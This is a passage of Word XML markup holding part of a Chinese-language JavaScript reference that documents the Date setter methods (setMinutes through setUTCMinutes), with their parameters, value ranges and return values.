        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setMinutes(minutes,seconds,millis)</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minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一</w:t>
      </w:r>
      <w:r>
        <w:t>个整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的分钟值（本地时间）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的秒钟值（本地时间）。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，不支持这个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>millis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的毫秒值（本地时间）。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，不支持这个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调整过后的日期的毫秒表示形式。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，这个方法什么也不返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="630" w:name="Date_setMonth__"/>
      <w:r>
        <w:t>Date.setMonth()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="630"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的月份及日期值</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date.setMonth(month)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setMonth(month,day)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>month</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月）～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>月）之间的一个整数，将用做该</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新月份值（本地时间）。注意月份从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始，而</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月中的日期从</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>day</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做该</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的对应月份中的日期值（本地时间）。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，不支持这个参数。</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调整后的日期的毫秒表现形式。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，这个方法什么也不返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="631" w:name="Date_setSeconds__"/>
      <w:r>
        <w:t>Date.setSeconds()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="631"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的秒钟及毫秒值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date.setSeconds(seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setSeconds(seconds,millis)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t>seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的秒钟值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>millis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做该</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新毫秒值（本地时间）。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，不支持这个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调整过后的日期的毫秒表现值。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，这个参数什么也不返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="632" w:name="Date_setTime__"/>
      <w:r>
        <w:t>Date.setTime()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="632"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用毫秒值设置一</w:t>
      </w:r>
      <w:r>
        <w:t>个时间</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date.setTime(milliseconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>milliseconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要的日期及时间与</w:t>
      </w:r>
      <w:r>
        <w:t>1970-01-01</w:t>
      </w:r>
      <w:r>
        <w:t>午夜（</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）之间的毫秒数。这种类型的毫秒值也可以传入</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，还可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>方法获得。将日期转换为这种毫秒格式后，它将与时区无关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>milliseconds</w:t>
      </w:r>
      <w:r>
        <w:t>参数。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，这个方法什么也不返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="633" w:name="Date_setUTCDate__"/>
      <w:r>
        <w:t>Date.setUTCDate()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="633"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的对应月中的日期值（全球时间）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date.setUTCDate(day_of_month)</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day_of_month</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的对应月中的日期值，以全球时间表示。这个参数应该是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。</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调整后的日期的内部毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="634" w:name="Date_setUTCFullYear__"/>
      <w:r>
        <w:t>Date.setUTCFullYear()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="634"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的年份、月份以及日期值（全球时间）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date.setUTCFullYear(year)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setSeconds(seconds,millis)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setUTCFullYear(year,month,day)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>year</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将用做</w:t>
      </w:r>
      <w:r>
        <w:t>dat e</w:t>
      </w:r>
      <w:r>
        <w:t>的以全球时间表示的年份值。这个参数应该是一个包含世纪的整数，如</w:t>
      </w:r>
      <w:r>
        <w:t>1999</w:t>
      </w:r>
      <w:r>
        <w:t>，不能是缩写，如</w:t>
      </w:r>
      <w:r>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>month</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的月份值（全球时间）。注意月份是以</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始的数字，而月份中的日期则以</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>day</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的对应月中的新日期值（全球时间）。</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调整后的时间的毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="635" w:name="Date_setUTCHours__"/>
      <w:r>
        <w:t>Date.setUTCHours()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="635"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的小时、分钟、秒钟以及毫秒值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date.setUTCHours(hour</w:t>
      </w:r>
      <w:r>
        <w:t>s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setUTCHours(hours,minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>date.setUTCHours(hours,minutes,seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setUTCHours(hours,minutes,seconds,millis)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t>hours</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的以全球时间表示的小时值。这个参数应该为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（午夜）～</w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:t>（晚上</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>点）之间的一个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新分钟值（全球时间）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新秒钟值（全球时间）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>millis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个可选整数，将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的新毫秒值（全球时间）。</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调整后的日期的毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="636" w:name="Date_setUTCMilliseconds__"/>
      <w:r>
        <w:t>Date.setUTCMilliseconds()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="636"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的毫秒值（全球时间）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date.setUTCMilliseconds(millis)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t>millis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将用做</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的以全球时间表示的毫秒值。这个参数应该为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。</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调整后的日期的毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="637" w:name="Date_setUTCMinutes__"/>
      <w:r>
        <w:t>Date.setUTCMi</w:t>
      </w:r>
      <w:r>
        <w:t>nutes()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="637"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的分钟、秒钟以及毫秒值（全球时间）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date.setUTCMinutes(minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setUTCMinutes(minutes,seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.setUTCMinutes(minutes,seconds,millis)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t>minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
